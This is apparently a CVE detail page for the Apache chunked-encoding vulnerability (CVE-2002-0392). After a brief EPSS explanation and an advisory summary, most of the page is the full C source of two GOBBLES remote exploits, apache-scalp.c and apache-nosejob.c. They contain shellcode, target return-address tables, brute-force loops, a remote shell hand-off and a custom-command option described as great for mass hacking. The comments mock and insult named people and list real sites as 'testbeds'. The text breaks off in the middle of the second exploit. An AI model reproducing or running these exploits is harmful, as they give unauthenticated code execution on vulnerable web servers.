CVE-2002-0392 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/5033/info When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper (signed) interpretation of an unsigned integer value. Consequently, several conditions that have security implications may occur. Reportedly, a buffer overrun and signal race condition occur. Exploiting these conditions may allow arbitrary code to run. **Update**: Reportedly, at least one worm is exploiting this vulnerability to propagate in the wild. The worm targets FreeBSD 4.5 systems running Apache 1.3.22-24 and 1.3.20. Other versions may also be affected. /* * apache-scalp.c * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!! * * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ! * * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING! * * ". . . and Doug Sniff said it was a hole in Epic." * * --- * Disarm you with a smile * And leave you like they left me here * To wither in denial * The bitterness of one who's left alone * --- * * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to * the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and * their crappy memcpy implementation that makes this 32-bit impossibility * very easy to accomplish. This vulnerability was recently rediscovered by a slew * of researchers. * * The "experts" have already concurred that this bug... * - Can not be exploited on 32-bit *nix variants * - Is only exploitable on win32 platforms * - Is only exploitable on certain 64-bit systems * * However, contrary to what ISS would have you believe, we have * successfully exploited this hole on the following operating systems: * * Sun Solaris 6-8 (sparc/x86) * FreeBSD 4.3-4.5 (x86) * OpenBSD 2.6-3.1 (x86) * Linux (GNU) 2.4 (x86) * * Don't get discouraged too quickly in your own research. It took us close * to two months to be able to exploit each of the above operating systems. * There is a peculiarity to be found for each operating system that makes the * exploitation possible. * * Don't email us asking for technical help or begging for warez. We are * busy working on many other wonderful things, including other remotely * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform * the community that those holes don't exist? We wonder who's paying her. * * This code is an early version from when we first began researching the * vulnerability. It should spawn a shell on any unpatched OpenBSD system * running the Apache webserver. * * We appreciate The Blue Boar's effort to allow us to post to his mailing * list once again. Because he finally allowed us to post, we now have this * very humble offering. * * This is a very serious vulnerability. After disclosing this exploit, we * hope to have gained immense fame and glory. * * Testbeds: synnergy.net, monkey.org, 9mm.com * * Abusing the right syscalls, any exploit against OpenBSD == root. Kernel * bugs are great. * * [#!GOBBLES QUOTES] * * --- you just know 28923034839303 admins out there running * OpenBSD/Apache are going "ugh..not exploitable..ill do it after the * weekend" * --- "Five years without a remote hole in the default install". default * package = kernel. if theo knew that talkd was exploitable, he'd cry. * --- so funny how apache.org claims it's impossible to exploit this. * --- how many times were we told, "ANTISEC IS NOT FOR YOU" ? * --- I hope Theo doesn't kill himself * --- heh, this is a middle finger to all those open source, anti-"m$" * idiots... slashdot hippies... * --- they rushed to release this exploit so they could update their ISS * scanner to have a module for this vulnerability, but it doesnt even * work... it's just looking for win32 apache versions * --- no one took us seriously when we mentioned this last year. we warned * them that moderation == no pie. * --- now try it against synnergy :> * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM * * xxxx this thing is a major exploit. do you really wanna publish it? * oooo i'm not afraid of whitehats * xxxx the blackhats will kill you for posting that exploit * oooo blackhats are a myth * oooo so i'm not worried * oooo i've never seen one * oooo i guess it's sort of like having god in your life * oooo i don't believe there's a god * oooo but if i sat down and met him * oooo i wouldn't walk away thinking * oooo "that was one hell of a special effect" * oooo so i suppose there very well could be a blackhat somewhere * oooo but i doubt it... i've seen whitehat-blackhats with their ethics * and deep philosophy... * * [GOBBLES POSERS/WANNABES] * * --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it) * --- [email protected] (low-level.net) * * GOBBLES Security * [email protected] * http://www.bugtraq.org * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/time.h> #include <signal.h> #define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it failed */ #define RET_ADDR_INC 512 #define MEMCPY_s1_OWADDR_DELTA -146 #define PADSIZE_1 4 #define PADSIZE_2 5 #define PADSIZE_3 7 #define REP_POPULATOR 24 #define REP_RET_ADDR 6 #define REP_ZERO 36 #define REP_SHELLCODE 24 #define NOPCOUNT 1024 #define NOP 0x41 #define PADDING_1 'A' #define PADDING_2 'B' #define PADDING_3 'C' #define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s); #define PUT_BYTES(n, b) memset(p, b, n); p += n; #define SHELLCODE_LOCALPORT_OFF 30 char shellcode[] = "\x89\xe2\x83\xec\x10\x6a\x10\x54\x52\x6a\x00\x6a\x00\xb8\x1f" "\x00\x00\x00\xcd\x80\x80\x7a\x01\x02\x75\x0b\x66\x81\x7a\x02" "\x42\x41\x75\x03\xeb\x0f\x90\xff\x44\x24\x04\x81\x7c\x24\x04" "\x00\x01\x00\x00\x75\xda\xc7\x44\x24\x08\x00\x00\x00\x00\xb8" "\x5a\x00\x00\x00\xcd\x80\xff\x44\x24\x08\x83\x7c\x24\x08\x03" "\x75\xee\x68\x0b\x6f\x6b\x0b\x81\x34\x24\x01\x00\x00\x01\x89" "\xe2\x6a\x04\x52\x6a\x01\x6a\x00\xb8\x04\x00\x00\x00\xcd\x80" "\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe2\x31\xc0\x50" "\x52\x89\xe1\x50\x51\x52\x50\xb8\x3b\x00\x00\x00\xcd\x80\xcc"; struct { char *type; u_long retaddr; } targets[] = { // hehe, yes theo, that say OpenBSD here! { "OpenBSD 3.0 x86 / Apache 1.3.20", 0xcf92f }, { "OpenBSD 3.0 x86 / Apache 1.3.22", 0x8f0aa }, { "OpenBSD 3.0 x86 / Apache 1.3.24", 0x90600 }, { "OpenBSD 3.1 x86 / Apache 1.3.20", 0x8f2a6 }, { "OpenBSD 3.1 x86 / Apache 1.3.23", 0x90600 }, { "OpenBSD 3.1 x86 / Apache 1.3.24", 0x9011a }, { "OpenBSD 3.1 x86 / Apache 1.3.24 #2", 0x932ae }, }; int main(int argc, char *argv[]) { char *hostp, *portp; unsigned char buf[512], *expbuf, *p; int i, j, lport; int sock; int bruteforce, owned, progress; u_long retaddr; struct sockaddr_in sin, from; if(argc != 3) { printf("Usage: %s <target#|base address> <ip[:port]>\n", argv[0]); printf(" Using targets:\t./apache-scalp 3 127.0.0.1:8080\n"); printf(" Using bruteforce:\t./apache-scalp 0x8f000 127.0.0.1:8080\n"); printf("\n--- --- - Potential targets list - --- ----\n"); printf("Target ID / Target specification\n"); for(i = 0; i < sizeof(targets)/8; i++) printf("\t%d / %s\n", i, targets[i].type); return -1; } hostp = strtok(argv[2], ":"); if((portp = strtok(NULL, ":")) == NULL) portp = "80"; retaddr = strtoul(argv[1], NULL, 16); if(retaddr < sizeof(targets)/8) { retaddr = targets[retaddr].retaddr; bruteforce = 0; } else bruteforce = 1; srand(getpid()); signal(SIGPIPE, SIG_IGN); for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) { /* skip invalid return adresses */ i = retaddr & 0xff; if(i == 0x0a || i == 0x0d) retaddr++; else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4)) continue; sock = socket(AF_INET, SOCK_STREAM, 0); sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(hostp); sin.sin_port = htons(atoi(portp)); if(!progress) printf("\n[*] Connecting.. "); fflush(stdout); if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); } if(!progress) printf("connected!\n"); /* Setup the local port in our shellcode */ i = sizeof(from); if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) { perror("getsockname()"); exit(1); } lport = ntohs(from.sin_port); shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff; shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff; p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE) + ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR)); PUT_STRING("GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n"); for (i = 0; i < REP_SHELLCODE; i++) { PUT_STRING("X-"); PUT_BYTES(PADSIZE_3, PADDING_3); PUT_STRING(": "); PUT_BYTES(NOPCOUNT, NOP); memcpy(p, shellcode, sizeof(shellcode) - 1); p += sizeof(shellcode) - 1; PUT_STRING("\r\n"); } for (i = 0; i < REP_POPULATOR; i++) { PUT_STRING("X-"); PUT_BYTES(PADSIZE_1, PADDING_1); PUT_STRING(": "); for (j = 0; j < REP_RET_ADDR; j++) { *p++ = retaddr & 0xff; *p++ = (retaddr >> 8) & 0xff; *p++ = (retaddr >> 16) & 0xff; *p++ = (retaddr >> 24) & 0xff; } PUT_BYTES(REP_ZERO, 0); PUT_STRING("\r\n"); } PUT_STRING("Transfer-Encoding: chunked\r\n"); snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2); PUT_STRING(buf); PUT_BYTES(PADSIZE_2, PADDING_2); snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", MEMCPY_s1_OWADDR_DELTA); PUT_STRING(buf); write(sock, expbuf, p - expbuf); progress++; if((progress%70) == 0) progress = 1; if(progress == 1) { memset(buf, 0, sizeof(buf)); sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport %u", retaddr, (unsigned int)(p - expbuf), lport); memset(buf + strlen(buf), ' ', 74 - strlen(buf)); puts(buf); if(bruteforce) putchar(';'); } else putchar((rand()%2)? 'P': 'p'); fflush(stdout); while (1) { fd_set fds; int n; struct timeval tv; tv.tv_sec = EXPLOIT_TIMEOUT; tv.tv_usec = 0; FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(sock, &fds); memset(buf, 0, sizeof(buf)); if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) { if(FD_ISSET(sock, &fds)) { if((n = read(sock, buf, sizeof(buf) - 1)) <= 0) break; if(!owned && n >= 4 && memcmp(buf, "\nok\n", 4) == 0) { printf("\nGOBBLE GOBBLE!@#%%)*#\n"); printf("retaddr 0x%lx did the trick!\n", retaddr); sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\n"); write(sock, expbuf, strlen(expbuf)); owned++; } write(1, buf, n); } if(FD_ISSET(0, &fds)) { if((n = read(0, buf, sizeof(buf) - 1)) < 0) exit(1); write(sock, buf, n); } } if(!owned) break; } free(expbuf); close(sock); if(owned) return 0; if(!bruteforce) { fprintf(stderr, "Ooops.. hehehe!\n"); return -1; } } return 0; }

// source: https://www.securityfocus.com/bid/5033/info When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper (signed) interpretation of an unsigned integer value. Consequently, several conditions that have security implications may occur. Reportedly, a buffer overrun and signal race condition occur. Exploiting these conditions may allow arbitrary code to run. **Update**: Reportedly, at least one worm is exploiting this vulnerability to propagate in the wild. The worm targets FreeBSD 4.5 systems running Apache 1.3.22-24 and 1.3.20. Other versions may also be affected. /* * apache-nosejob.c - Now with FreeBSD & NetBSD targets ;> * * !! THIS EXPLOIT IS NOW PRIVATE ON BUGTRAQ !! * * USE BRUTE FORCE ! "AUTOMATED SCRIPT KIDDY" ! USE BRUTE FORCE ! * * YEZ!$#@ YOU CAN EVEN DEFACE BUGTRAQ.ORG! * * Your high priced security consultant's plane ticket: $1500 * Your high priced security consultant's time: $200/hour * RealSecure nodes all over your company: $200,000 * Getting owned by 0day: Priceless * * * BEG FOR FAVOR * BEG FOR FAVOR * BEG FOR FAVOR * BEG FOR FAVOR * * If somebody could do us a big favor and contact Jennifer Garner and ask * her to make a journey to Vegas this summer for Defcon, to hang out with * the members of GOBBLES Security who are all huge fans of hers, we would * be eternally grateful. We are 100% serious about this. We would love * to have a chance to sit down and have a nice conversation with her during * the conference -- something little to make our lives feel more complete. * * Just show her this picture, and she'll understand that we're not some * crazy obsessive fanatical lunatics that she would want to avoid. ;-) * http://phrack.org/summercon2002/GOBBLES_show.jpg * We even promise to keep our clothes on! * * Thx to all those GOBBLES antagonizers. Your insults fuel our desire to * work harder to gain more fame. * * This exploit brought to you by a tagteam effort between GOBBLES Security * and ISS X-Forces. ISS supplied the silly mathematical computations and * other abstract figures declaring the exploitation of this bug to be * impossible, without factoring in the chance that there might be other * conditions present that would allow exploitation. After the failure of * ISS' Santa Claus, GOBBLES Security didn't want to disappoint the kids and * the security consultants and have brought forth a brand new shiny toy for * all to marvel at. * * GOBBLES Security Sex Force: A lot of companies like to let you know * their employees have the biggest dicks. We're firm believers in the * idea that it's not the size of the wave, but rather the motion of the * ocean -- we have no choice anyway. * * 3APAPAPA said this can't be done on FreeBSD. He probably also thinks * qmail can't be exploited remotely. Buzzz! There we go speaking through * our asses again. Anyways we're looking forward to his arguments on why * this isn't exploitable on Linux and Solaris. Lead, follow, or get the * fuck out of the way. * * Weigh the chances of us lying about the Linux version. Hmm, well so far * we've used a "same shit, different smell" approach on *BSD, so you could * be forgiven for thinking we have no Linux version. Then bring in the * reverse psychology factor of this paragraph that also says we don't have * one. But we'd say all of the above to make you believe us. This starts to * get really complicated. * * --- * God knows I'm helpless to speak * On my own behalf * God is as helpless as me * Caught in the negatives * We all just do as we please * False transmissions * I hope God forgives me * For my transgressions * * It's what you want * To know no consequences * It's what you need * To fucking bleed * It's all too much * --- * * Changes: * + can do hostname resolution * + uses getopt() * + works against freebsd and netbsd now * + ability to execute custom commands when shellcode replies -- great for * mass hacking * + rand() value bitshifted for more randomness in our progress bar tongues * + more targets ;> BUT REMEMBER BRUTE FORCE MODE!!! * + [RaFa] complained that the first version didn't let him hack through * proxies. New shellcode has been added for additional fun. It's real * funky, monkey, do you trust? Didn't think so. * * Fun to know: * + Most apache installations don't even log the attack * + GOBBLES Security is not playing games anymore. * + GOBBLES Security has more active members than w00w00. * + w00w00.org is still vulnerable to this exploit. * + w00w00 might release another AIM advisory soon about how evil the * whole DMCA thing is. *yawn* * * Fun to do: * + Spot the #openbsd operator who can figure out how to use this! * + Join #snort and laugh at their inadequacies * + Question the effectiveness of Project Honeynet, when they have yet * to discover the exploitation of a single "0day" vulnerability in the * wild. HURRY UP B0YZ 4ND H4CK Y0UR 0WN H0N3YP0TZ N0W W1TH 4LL Y0UR * 0DAY T0 PR0V3 US WR0NG!!@# Dumb twats. * * 80% of #openbsd won't be patching Apache because: * + "It's not in the default install" * + "It's only uid nobody. So what?" * + "Our memcpy() implementation is not buggy" * + "I couldn't get the exploit to work, so it must not actually be * exploitable. Stupid GOBBLES wasting my time with nonsense" * + jnathan's expert advice to his peers is that "this is not much of * a security issue" -- @stake + w00w00 + snort brain power in action! * * Testbeds: hotmail.com, 2600.com, w00w00.org, efnet.org, atstake.com, * yahoo.com, project.honeynet.org, pub.seastrom.com * * !! NOTICE TO CRITICS !! NOTICE TO CRITICS !! NOTICE TO CRITICS !! * * If you're using this exploit against a vulnerable machine (that the * exploit is supposed to work on, quit mailing us asking why apache-scalp * doesn't work against Linux -- dumbasses) and it does not succeed, you * will have to play with the r|d|z values and * BRUTEFORCE * BRUTEFORCE * * * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE * * * We wrote this for ethical purposes only. There is such a thing as an * "ethical hacker" right? * * This should make penetration testing _very_ easy. Go out and make some * money off this, by exploiting the ignorance of some yahoo who will be * easily ./impressed with your ability to use gcc. No, we won't provide * you with precompiled binaries. Well, at least for *nix. ;-) * * * IMPORTANT ANNOUCEMENT * IMPORTANT ANNOUNCEMENT * IMPORTANT ANNOUCEMENT * * --- GOBBLES Security is no longer accepting new members. We're now a * closed group. Of course, we'll still share our warez with the * community at large, but for the time we have enough members. * * Greets to our two newest members: * -[RaFa], Ambassador to the Underworld * -pr0ix, Director of Slander and Misinformation * * [#!GOBBLES@SECRET_SERVER QUOTES] * * --- i wont be surprised that when I return tomorrow morning the * internet will have come to a grinding halt with people crying for * medics * --- the internet will be over in a couple of months * --- nobody in #openbsd can get it to work... #netbsd people seem to be * managing fine... * --- they dont grasp the concept of the base address... i seriously * thought this was the most kiddie friendly exploit ever released * --- even bb could get it working. look at vuln-dev * --- we have to try to bump that threatcon up a notch * --- what the alldas url now? how many defacements appeared yet? * --- we should do a poem entitled "default openbsd" and mention how * it just sits there... inanimate... soon theo will be stripping the * network code so not even gobkltz.c works... as theo's paranoia * increases and he becomes out of sync with the real world, strange * things start to happen with openbsd... CHANGELOG: "now also safe * from the voices. 6 years without the screaming in the default * install" * --- i can port it to windows.. i can make a gui using mfc.. with * a picture of the skull & crossbones * --- Has anyone ever been caught by an IDS? I certainly never have. * This one runs on many machines. It ports to HP-UX. * --- strange how mr spitzner didn't know honeynet.org was owned * --- an official openbsd mirror is still vulnerable? dear god they're * out of it! * --- I think we're finally famous. * --- we're on the front page of securityfocus, and we didn't even have * to deface them! too bad the article wasn't titled, "Hi BlueBoar!" * --- we need GOBBLES group photos at defcon holding up signs that say * "The Blue Boar Must Die" * --- project.honeynet.org is _still_ vulnerable a day after the exploit * was made public? hahaha! * --- exploit scanner? www.google.com -- search for poweredby.gif + your * *bsd of choice! * --- i stopped taking my antipsychotics last night. say no 2 drugz! * --- <GOBBLES> antiNSA -- HACKING IS NOT FOR YOU!!!!!! * --- we wonder how much they'll like GeneralCuster.exe * --- wonder if ISS will use our code in their "security assesment" * audits, or if they'll figure out how to exploit this independantly. * either way they're bound to make a lot of money off us, bastards. * --- forget w00giving, this year itz thanksgiving. * --- the traffic to netcraft.com/whats will be through the roof for the * next few months! * --- every company with a hub has been sold multiple realsensor units * --- full disclosure is a necessary evil, so quit your goddamned whining. * --- people just assume they know what we mean by "testbed" * --- i can't believe that people still disbelieve in the existance of * hackers... i mean, what is all this bullshit about people being * shocked that hackers write programs to break into systems so that * they can use those programs to break into systems? are their minds * that small? * --- we're far from done. . . * */ /* * apache-scalp.c * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!! * * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ! * * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING! * * ". . . and Doug Sniff said it was a hole in Epic." * * --- * Disarm you with a smile * And leave you like they left me here * To wither in denial * The bitterness of one who's left alone * --- * * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to * the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and * their crappy memcpy implementation that makes this 32-bit impossibility * very easy to accomplish. This vulnerability was recently rediscovered by a slew * of researchers. * * The "experts" have already concurred that this bug... * - Can not be exploited on 32-bit *nix variants * - Is only exploitable on win32 platforms * - Is only exploitable on certain 64-bit systems * * However, contrary to what ISS would have you believe, we have * successfully exploited this hole on the following operating systems: * * Sun Solaris 6-8 (sparc/x86) * FreeBSD 4.3-4.5 (x86) * OpenBSD 2.6-3.1 (x86) * Linux (GNU) 2.4 (x86) * * Don't get discouraged too quickly in your own research. It took us close * to two months to be able to exploit each of the above operating systems. * There is a peculiarity to be found for each operating system that makes the * exploitation possible. * * Don't email us asking for technical help or begging for warez. We are * busy working on many other wonderful things, including other remotely * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform * the community that those holes don't exist? We wonder who's paying her. * * This code is an early version from when we first began researching the * vulnerability. It should spawn a shell on any unpatched OpenBSD system * running the Apache webserver. * * We appreciate The Blue Boar's effort to allow us to post to his mailing * list once again. Because he finally allowed us to post, we now have this * very humble offering. * * This is a very serious vulnerability. After disclosing this exploit, we * hope to have gained immense fame and glory. * * Testbeds: synnergy.net, monkey.org, 9mm.com * * Abusing the right syscalls, any exploit against OpenBSD == root. Kernel * bugs are great. * * [#!GOBBLES QUOTES] * * --- you just know 28923034839303 admins out there running * OpenBSD/Apache are going "ugh..not exploitable..ill do it after the * weekend" * --- "Five years without a remote hole in the default install". default * package = kernel. if theo knew that talkd was exploitable, he'd cry. * --- so funny how apache.org claims it's impossible to exploit this. * --- how many times were we told, "ANTISEC IS NOT FOR YOU" ? * --- I hope Theo doesn't kill himself * --- heh, this is a middle finger to all those open source, anti-"m$" * idiots... slashdot hippies... * --- they rushed to release this exploit so they could update their ISS * scanner to have a module for this vulnerability, but it doesnt even * work... it's just looking for win32 apache versions * --- no one took us seriously when we mentioned this last year. we warned * them that moderation == no pie. * --- now try it against synnergy :> * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM * * xxxx this thing is a major exploit. do you really wanna publish it? * oooo i'm not afraid of whitehats * xxxx the blackhats will kill you for posting that exploit * oooo blackhats are a myth * oooo so i'm not worried * oooo i've never seen one * oooo i guess it's sort of like having god in your life * oooo i don't believe there's a god * oooo but if i sat down and met him * oooo i wouldn't walk away thinking * oooo "that was one hell of a special effect" * oooo so i suppose there very well could be a blackhat somewhere * oooo but i doubt it... i've seen whitehat-blackhats with their ethics * and deep philosophy... * * [GOBBLES POSERS/WANNABES] * * --- #!GOBBLES@EFNET (none of us join here, but we've sniffed it) * --- [email protected] (low-level.net) * * GOBBLES Security * [email protected] * http://www.bugtraq.org * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/time.h> #include <signal.h> #ifdef __linux__ #include <getopt.h> #endif #define HOST_PARAM "apache-nosejob.c" /* The Host: field */ #define DEFAULT_CMDZ "uname -a;id;echo 'hehe, now use another bug/backdoor/feature (hi Theo!) to gain instant r00t';\n" #define RET_ADDR_INC 512 #define PADSIZE_1 4 #define PADSIZE_2 5 #define PADSIZE_3 7 #define REP_POPULATOR 24 #define REP_SHELLCODE 24 #define NOPCOUNT 1024 #define NOP 0x41 #define PADDING_1 'A' #define PADDING_2 'B' #define PADDING_3 'C' #define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s); #define PUT_BYTES(n, b) memset(p, b, n); p += n; char shellcode[] = "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50\x50\xc6\x04\x24" "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1\x18\xd1\xea\x31" "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24\x04\x80\x7c\x24" "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44\x24\x04\x20\x89" "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89\x44\x24\x14\x89" "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0\xb0\x5d\xcd\x80" "\x31\xc9\xd1\x2c\x24\x73\x27\x31\xc0\x50\x50\x50\x50\xff\x04\x24" "\x54\xff\x04\x24\xff\x04\x24\xff\x04\x24\xff\x04\x24\x51\x50\xb0" "\x1d\xcd\x80\x58\x58\x58\x58\x58\x3c\x4f\x74\x0b\x58\x58\x41\x80" "\xf9\x20\x75\xce\xeb\xbd\x90\x31\xc0\x50\x51\x50\x31\xc0\xb0\x5a" "\xcd\x80\xff\x44\x24\x08\x80\x7c\x24\x08\x03\x75\xef\x31\xc0\x50" "\xc6\x04\x24\x0b\x80\x34\x24\x01\x68\x42\x4c\x45\x2a\x68\x2a\x47" "\x4f\x42\x89\xe3\xb0\x09\x50\x53\xb0\x01\x50\x50\xb0\x04\xcd\x80" "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50" "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"; ; struct { char *type; /* description for newbie penetrator */ int delta; /* delta thingie! */ u_long retaddr; /* return address */ int repretaddr; /* we repeat retaddr thiz many times in the buffer */ int repzero; /* and \0'z this many times */ } targets[] = { // hehe, yes theo, that say OpenBSD here! { "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)", -150, 0x80f3a00, 6, 36 }, { "FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)", -150, 0x80a7975, 6, 36 }, { "OpenBSD 3.0 x86 / Apache 1.3.20", -146, 0xcfa00, 6, 36 }, { "OpenBSD 3.0 x86 / Apache 1.3.22", -146, 0x8f0aa, 6, 36 }, { "OpenBSD 3.0 x86 / Apache 1.3.24", -146, 0x90600, 6, 36 }, { "OpenBSD 3.0 x86 / Apache 1.3.24 #2", -146, 0x98a00, 6, 36 }, { "OpenBSD 3.1 x86 / Apache 1.3.20", -146, 0x8f2a6, 6, 36 }, { "OpenBSD 3.1 x86 / Apache 1.3.23", -146, 0x90600, 6, 36 }, { "OpenBSD 3.1 x86 / Apache 1.3.24", -146, 0x9011a, 6, 36 }, { "OpenBSD 3.1 x86 / Apache 1.3.24 #2", -146, 0x932ae, 6, 36 }, { "OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1", -146, 0x1d7a00, 6, 36 }, { "NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)", -90, 0x80eda00, 5, 42 }, { "NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)", -90, 0x80efa00, 5, 42 }, { "NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)", -90, 0x80efa00, 5, 42 }, { "NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)", -90, 0x80efa00, 5, 42 }, { "NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)", -90, 0x80efa00, 5, 42 }, }, victim; void usage(void) { int i; printf("GOBBLES Security Labs\t\t\t\t\t- apache-nosejob.c\n\n"); printf("Usage: ./apache-nosejob <-switches> -h host[:80]\n"); printf(" -h host[:port]\tHost to penetrate\n"); printf(" -t #\t\t\tTarget id.\n"); printf(" Bruteforcing options (all required, unless -o is used!):\n"); printf(" -o char\t\tDefault values for the following OSes\n"); printf(" \t\t\t(f)reebsd, (o)penbsd, (n)etbsd\n"); printf(" -b 0x12345678\t\tBase address used for bruteforce\n"); printf(" \t\t\tTry 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd.\n"); printf(" -d -nnn\t\tmemcpy() delta between s1 and addr to overwrite\n"); printf(" \t\t\tTry -146/obsd, -150/fbsd, -90/nbsd.\n"); printf(" -z #\t\t\tNumbers of time to repeat \\0 in the buffer\n"); printf(" \t\t\tTry 36 for openbsd/freebsd and 42 for netbsd\n"); printf(" -r #\t\t\tNumber of times to repeat retadd in the buffer\n"); printf(" \t\t\tTry 6 for openbsd/freebsd and 5 for netbsd\n"); printf(" Optional stuff:\n"); printf(" -w #\t\t\tMaximum number of seconds to wait for shellcode reply\n"); printf(" -c cmdz\t\tCommands to execute when our shellcode replies\n"); printf(" \t\t\taka auto0wncmdz\n"); printf("\nExamples will be published in upcoming apache-scalp-HOWTO.pdf\n"); printf("\n--- --- - Potential targets list - --- ---- ------- ------------\n"); printf(" ID / Return addr / Target specification\n"); for(i = 0; i < sizeof(targets)/sizeof(victim); i++) printf("% 3d / 0x%.8lx / %s\n", i, targets[i].retaddr, targets[i].type); exit(1); } int main(int argc, char *argv[]) { char *hostp, *portp, *cmdz = DEFAULT_CMDZ; u_char buf[512], *expbuf, *p; int i, j, lport, sock; int bruteforce, owned, progress, sc_timeout = 5; int responses, shown_length = 0; struct in_addr ia; struct sockaddr_in sin, from; struct hostent *he; if(argc < 4) usage(); bruteforce = 0; memset(&victim, 0, sizeof(victim)); while((i = getopt(argc, argv, "t:b:d:h:w:c:r:z:o:")) != -1) { switch(i) { /* required stuff */ case 'h': hostp = strtok(optarg, ":"); if((portp = strtok(NULL, ":")) == NULL) portp = "80"; break; /* predefined targets */ case 't': if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) { printf("Invalid target\n"); return -1; } memcpy(&victim, &targets[atoi(optarg)], sizeof(victim)); break; /* bruteforce! */ case 'b': bruteforce++; victim.type = "Custom target"; victim.retaddr = strtoul(optarg, NULL, 16); printf("Using 0x%lx as the baseadress while bruteforcing..\n", victim.retaddr); break; case 'd': victim.delta = atoi(optarg); printf("Using %d as delta\n", victim.delta); break; case 'r': victim.repretaddr = atoi(optarg); printf("Repeating the return address %d times\n", victim.repretaddr); break; case 'z': victim.repzero = atoi(optarg); printf("Number of zeroes will be %d\n", victim.repzero); break; case 'o': bruteforce++; switch(*optarg) { case 'f': victim.type = "FreeBSD"; victim.retaddr = 0x80a0000; victim.delta = -150; victim.repretaddr = 6; victim.repzero = 36; break; case 'o': victim.type = "OpenBSD"; victim.retaddr = 0x80000; victim.delta = -146; victim.repretaddr = 6; victim.repzero = 36; break; case 'n': victim.type = "NetBSD"; victim.retaddr = 0x080e0000; victim.delta = -90; victim.repretaddr = 5; victim.repzero = 42; break; default: printf("[-] Better luck next time!\n"); break; } break; /* optional stuff */ case 'w': sc_timeout = atoi(optarg); printf("Waiting maximum %d seconds for replies from shellcode\n", sc_timeout); break; case 'c': cmdz = optarg; break; default: usage(); break; } } if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero) { printf("[-] Incomplete target. At least 1 argument is missing (nmap style!!)\n"); return -1; } printf("[*] Resolving target host.. "); fflush(stdout); he = gethostbyname(hostp); if(he) memcpy(&ia.s_addr, he->h_addr, 4); else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY) { printf("There'z no %s on this side of the Net!\n", hostp); return -1; } printf("%s\n", inet_ntoa(ia)); srand(getpid()); signal(SIGPIPE, SIG_IGN); for(owned 